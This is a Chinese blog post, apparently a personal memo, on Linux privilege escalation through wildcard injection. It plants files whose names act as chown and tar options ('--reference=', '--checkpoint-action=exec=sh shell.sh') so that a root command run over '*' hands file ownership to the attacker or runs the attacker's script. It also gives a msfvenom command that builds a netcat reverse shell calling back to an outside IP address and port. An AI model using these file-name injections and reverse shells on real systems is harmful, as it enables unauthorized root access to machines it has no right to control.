记录Linux下的钓鱼提权思路

简介: 参考Freebuf上的提权文章(利用通配符进行Linux本地提权):http://www.freebuf.com/articles/system/176255.

参考Freebuf上的提权文章(利用通配符进行Linux本地提权):
http://www.freebuf.com/articles/system/176255.html

以两个例子的形式进行记录,作为备忘:

0x01 Chown的--reference特性

存在三个用户:root、yunsle和test,假设这样一个场景,root用户要将/home/test下所有的文件所有者设置为test,那么yunsle如何通过root的这样一个操作,达到攻击目的呢?
文件中目前内容如下:

snipaste20180802_114639.png
snipaste20180802_114639.png

攻击者yunsle在/home/test下创建两个文件,如下:

echo "">yunsle
echo > --reference=yunsle
snipaste20180802_114719.png
snipaste20180802_114719.png

此时root用户在当前目录下执行将所有文件拥有者设置为test的chown命令:

chown -R test:test *
snipaste20180802_114751.png
snipaste20180802_114751.png

虽然命令执行出现了报错,但是再查看文件,发现拥有者并没有修改为test,而是yunsle:

snipaste20180802_114819.png
snipaste20180802_114819.png

0x02 tar的命令执行:--checkpoint-action&--checkpoint

存在两个用户:root、yunsle,其中yunsle是非root组的攻击者,需要想办法提升权限,可以使用tar命令进行利用。

如果在cron计划中,root用户存在计划执行并且使用到了tar命令,或者攻击者提前知道root会对某个人文件执行tar,可以形成攻击场景。

攻击者首先自己可以生成一个反弹shell,如使用msfvenom:

msfvenom -p cmd/unix/reverse_netcat lhost=47.94.37.40 lport=7777 R
snipaste20180802_114846.png
snipaste20180802_114846.png

并且在接收机上监听7777端口:

snipaste20180802_114917.png
snipaste20180802_114917.png

将反弹shell内容在目标机上,写入shell.sh文件:

snipaste20180802_114931.png
snipaste20180802_114931.png

接下来再创建两个文件:

echo > "--checkpoint-action=exec=sh shell.sh"
echo > --checkpoint=1
snipaste20180802_114953.png
snipaste20180802_114953.png

此时,root对当前目录执行类似如下的tar操作:

tar -zcf bak.tgz /home/test/*
snipaste20180802_115017.png
snipaste20180802_115017.png

已经成功以root身份执行shell.sh,并且将shell反弹至攻击者服务器:

snipaste20180802_115034.png
snipaste20180802_115034.png
目录
相关文章
|
1月前
|
存储 Ubuntu Linux
2024全网最全面及最新且最为详细的网络安全技巧 (三) 之 linux提权各类技巧 上集
在本节实验中,我们学习了 Linux 系统登录认证的过程,文件的意义,并通过做实验的方式对 Linux 系统 passwd 文件提权方法有了深入的理解。祝你在接下来的技巧课程中学习愉快,学有所获~和文件是 Linux 系统登录认证的关键文件,如果系统运维人员对shadow或shadow文件的内容或权限配置有误,则可以被利用来进行系统提权。上一章中,我们已经学习了文件的提权方法, 在本章节中,我们将学习如何利用来完成系统提权。在本节实验中,我们学习了。
|
5月前
|
自然语言处理 安全 Shell
Linux 提权-SUID/SGID_1 本文通过 Google 翻译 SUID | SGID Part-1 – Linux Privilege Escalation 这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。
接下来,让我们看看 SUID3NUM 在枚举 SUID 二进制文件方面的表现如何。 3.2、枚举 SUID 二进制文件 – SUID3NUM 我们将用来枚举 SUID 二进制文件的第二个工具是 SUID3NUM。这是一个很棒的工具,因为它是专门为枚举 SUID 二进制文件而创建的。但这还不是全部,它还提供了可用于提升权限的命令(命令从 GTFOBins 中提取)。 这还不是最好的部分,SUID3NUM 还具有内置的 autopwn 功能,可以通过 -e 开关激活! 在 OSCP 考试中也使用此工具,只要您不使用自动利用功能。 3.2.1、下载并执行 SUID3NUM 我们可以从 GitHubs
42 0
|
7月前
|
Linux 开发工具
linux sudo指令提权
linux sudo指令提权
|
Ubuntu 安全 Linux
CVE-2021-3493 Linux kernel提权漏洞复现
CVE-2021-3493 Linux kernel提权漏洞复现
228 0
|
网络协议 Linux 网络安全
2023年中职“网络安全“—Linux系统深入提权③
2023年中职“网络安全“—Linux系统深入提权③
116 2
|
网络协议 Linux 测试技术
2023年中职“网络安全“—Linux系统深入提权②
2023年中职“网络安全“—Linux系统深入提权②
103 0
|
安全 Linux 数据安全/隐私保护
Linux DirtyPipe 内核提权漏洞 (CVE-2022-0847)
它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。
189 1
|
缓存 安全 Linux
Linux内核提权漏洞—CVE-2022-0874
Linux内核提权漏洞—CVE-2022-0874
132 1
|
安全 Shell Linux
linux提权总结
linux提权总结
319 0
|
存储 安全 Unix
干货 | 最详细Linux提权总结(建议收藏)
干货 | 最详细Linux提权总结(建议收藏)
2019 0